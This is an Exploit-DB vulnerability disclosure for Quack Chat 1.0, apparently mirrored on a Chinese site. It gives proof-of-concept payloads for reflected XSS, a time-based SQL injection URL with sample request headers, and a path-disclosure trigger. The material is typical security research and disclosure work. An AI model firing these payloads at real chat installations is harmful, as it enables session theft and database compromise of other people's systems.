Quack Chat 1.0 – Multiple Vulnerabilities - 体验盒子

作者： Dylan Irzi
日期： 2013-08-17
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/27652/
###########################################################################################
# Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Diclosure
# Date: 15 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.quack-chat.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.0
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev.
###########################################################################################

Cross Site Scripting:
Archivos Afectados Afectados

qchat.php
qc_admin/index.php?p=history

PoC:
localhost/qchat.php
Vector: ""><img src=x onerror=prompt(/XSS/);>>

Input:
<input id="name" type="text" style="width:200px;" name="name">
Is Reflected: localhost/qc_admin/index.php?p=history

PoC #2:
localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
Example:
localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E

-------------------------------------------------------------------
SQL Injection

localhost/qc_admin/index.php?p=history&id=(SQL Injection)
localhost/qc_admin/index.php?p=history&page=(SQL Injection)

# Exploit-DB note: Here's a PoC:
# <server>/qc_admin/index.php?p=history&id=1 and sleep(10)

Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e

(Remplazar por una Session Cookie Valida)

-------------------------------------------------------------------
Path Diclosure

localhost/qc_admin/index.php?p=history&id='

in /var/www/chat/qc_admin/index.php on line 249

--------------------------------------------------------------------

*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.

*